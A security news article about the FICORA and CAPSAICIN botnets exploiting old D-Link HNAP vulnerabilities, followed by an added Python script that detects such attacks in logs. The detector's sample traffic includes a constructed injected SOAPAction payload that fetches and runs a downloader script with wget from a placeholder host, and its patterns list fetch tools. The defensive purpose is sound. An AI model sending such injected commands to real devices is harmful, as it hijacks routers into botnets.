FICORA, CAPSAICIN Botnets Exploit Old D-Link Router Flaws for DDoS Attacks

Mirai and Keksec botnet variants are exploiting critical vulnerabilities in D-Link routers. Learn about the impact, affected devices, and how to protect yourself from these attacks.

HackRead

**In This Article, You Will Read About:**

  • Increased Botnet Activity: Surge in the activity of new “FICORA” and “CAPSAICIN” botnets, variants of Mirai and Kaiten.

  • Exploited Vulnerabilities: Attackers exploit known D-Link router vulnerabilities (e.g., CVE-2015-2051, CVE-2024-33112) to execute malicious commands.

  • Botnet Capabilities: Both botnets are delivered via shell scripts, target multiple Linux architectures, kill competing malware processes, and conduct DDoS attacks.

  • Global Impact: FICORA targeted countries worldwide, while CAPSAICIN focused on East Asia and was intensely active for only two days.

  • Mitigation Measures: Regular firmware updates and robust network monitoring are recommended to prevent exploitation.

FortiGuard Labs has observed a surge in the activity of two botnets, “FICORA” and “CAPSAICIN,” in October and November 2024. In its blog post, shared exclusively with Hackread.com, FortiGuard Labs’ Threat Research team explained that these botnets are variants of the well-known Mirai and Kaiten botnets and can execute malicious commands.

Further probing revealed that the distribution of these botnets involves exploiting D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings action on the Home Network Administration Protocol (HNAP) interface.

These vulnerabilities include CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. Each is a flaw in a D-Link router's HNAP implementation, typically in how it handles user-supplied input and authentication, that lets a remote attacker run commands on the device. Attackers abuse the HNAP interface to execute the command that fetches the malware; the oldest of these weaknesses was disclosed almost a decade ago.

The affected platforms include the D-Link DIR-645 Wired/Wireless Router Rev. Ax, D-Link DIR-806 devices, and the D-Link GO-RT-AC750 (firmware GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02). According to FortiGuard Labs IPS telemetry, both campaigns are rated high severity and still propagate through these long-known exploits.

The FICORA botnet targets multiple Linux architectures and encrypts its configuration with the ChaCha20 cipher. It also carries a brute-force attack feature, an embedded shell script (stored as hexadecimal ASCII) that identifies and kills competing malware processes, and DDoS attack functions over UDP, TCP, and DNS.

According to the FortiGuard Labs Threat Research team's blog post, this botnet downloads a shell script named 'multi' that tries several methods, including wget, ftpget, curl, and tftp, to fetch the actual malware.

Downloader script “multi” using the “curl” command (Via FortiGuard Labs)

The FICORA campaign, which hit targets in many countries, was launched from servers in the Netherlands. CAPSAICIN, by contrast, was intensely active for only two days, October 21 and 22, 2024, and targeted East Asian countries.

Like FICORA, it has a broad feature set: it downloads a shell script called 'bins.sh', targets multiple Linux architectures, kills known botnet processes, connects to its C2 server, sends victim host information, and offers DDoS attack functions.

Although the exploited vulnerabilities have been known for almost a decade, attacks against them remain prevalent, which is concerning. To reduce the risk of D-Link devices being recruited into these botnets, keep firmware up to date, maintain comprehensive network monitoring, and watch for HNAP requests reaching a router's management interface from untrusted networks.
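As an added example (not code from the HackRead article or from FortiGuard Labs), the following Python script turns the monitoring advice above into something runnable: it scans HTTP access-log lines for the HNAP GetDeviceSettings abuse described earlier and for the fetch tools (wget, ftpget, curl, tftp) that the 'multi' downloader stage cycles through. The key=value log format, the field names, and the sample log lines are constructed for illustration; the purenetworks.com/HNAP1 SOAP action namespace is the public HNAP convention and is assumed here, not taken from the article.

```python
"""Added example, not FortiGuard Labs' or HackRead's code: triage HTTP access
logs for D-Link HNAP GetDeviceSettings command-injection attempts and for the
stage-1 downloader tooling (wget/ftpget/curl/tftp) used by the "multi" script.
The log format, field names and sample lines are constructed for illustration."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed key=value log line, e.g.:
#   <ts> src=<ip> method=<m> uri=<path> [soapaction="<hdr>"] [body="<text>"] status=<code>
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+method=(?P<method>\S+)\s+uri=(?P<uri>\S+)'
    r'(?:\s+soapaction="(?P<soapaction>[^"]*)")?'
    r'(?:\s+body="(?P<body>[^"]*)")?'
    r'\s+status=(?P<status>\d+)\s*$'
)

# The HNAP action the article names as the injection point.
GETDEVICESETTINGS = re.compile(r"GetDeviceSettings", re.IGNORECASE)
# Shell metacharacters that never belong in an HNAP action name. A lone "&" is
# left out on purpose so XML entities (&amp;, &lt;) in real SOAP bodies do not alert.
SHELL_META = re.compile(r"[`;|]|\$\(|&&")
# Fetch tools the "multi" downloader cycles through, per the article.
DOWNLOADER = re.compile(r"\b(wget|ftpget|curl|tftp)\b", re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    src: str
    reasons: List[str]
    payloads: List[str]


def parse_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the parsed fields, or None for lines that do not match the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def inspect(rec: Dict[str, Optional[str]]) -> Optional[Finding]:
    """Flag a record when GetDeviceSettings and shell metacharacters share a field."""
    reasons: List[str] = []
    payloads: List[str] = []
    for fld in ("uri", "soapaction", "body"):
        val = rec.get(fld) or ""
        if GETDEVICESETTINGS.search(val) and SHELL_META.search(val):
            reasons.append(f"shell metacharacters in HNAP GetDeviceSettings ({fld})")
            payloads.append(val)
    if not reasons:
        return None
    # Second signal: the injected command pulls a stage-1 script with a fetch tool.
    if any(DOWNLOADER.search(p) for p in payloads):
        reasons.append("payload invokes a downloader (wget/ftpget/curl/tftp)")
    return Finding(rec["ts"] or "", rec["src"] or "", reasons, payloads)


def scan(lines) -> List[Finding]:
    """Run inspect() over every parseable line and collect the findings."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            f = inspect(rec)
            if f is not None:
                findings.append(f)
    return findings


# Constructed sample traffic (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    # Benign GetDeviceSettings call from the LAN side.
    '2024-10-21T03:14:01Z src=192.168.0.20 method=POST uri=/HNAP1/ '
    'soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings" status=200',
    # Injection attempt that also fetches and runs a stage-1 downloader script.
    '2024-10-21T03:14:07Z src=203.0.113.5 method=POST uri=/HNAP1/ '
    'soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; '
    'wget http://198.51.100.7/multi; sh multi`" status=500',
    # Injection attempt used only for reconnaissance.
    '2024-10-21T03:15:22Z src=203.0.113.9 method=POST uri=/HNAP1/ '
    'soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`id`" status=500',
    # Unrelated traffic.
    '2024-10-21T03:16:00Z src=198.51.100.3 method=GET uri=/index.html status=200',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.src}: {'; '.join(f.reasons)}")
```

Run as-is it reports the two hostile sources and stays silent on the benign LAN call; to use it on real proxy or IDS output, adapt LINE_RE to that log format. A plain `&` is deliberately not treated as a metacharacter so that XML entities in legitimate SOAP bodies do not trigger alerts, and the downloader check is a second, independent signal rather than a requirement, since the reconnaissance-only probe is still worth an alert.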

“FortiGuard Labs discovered that “FICORA” and “CAPSAICIN” spread through this weakness. Because of this, it is crucial for every enterprise to regularly update the kernel of their devices and maintain comprehensive monitoring,” FortiGuard Labs researcher Vincent Li concluded.
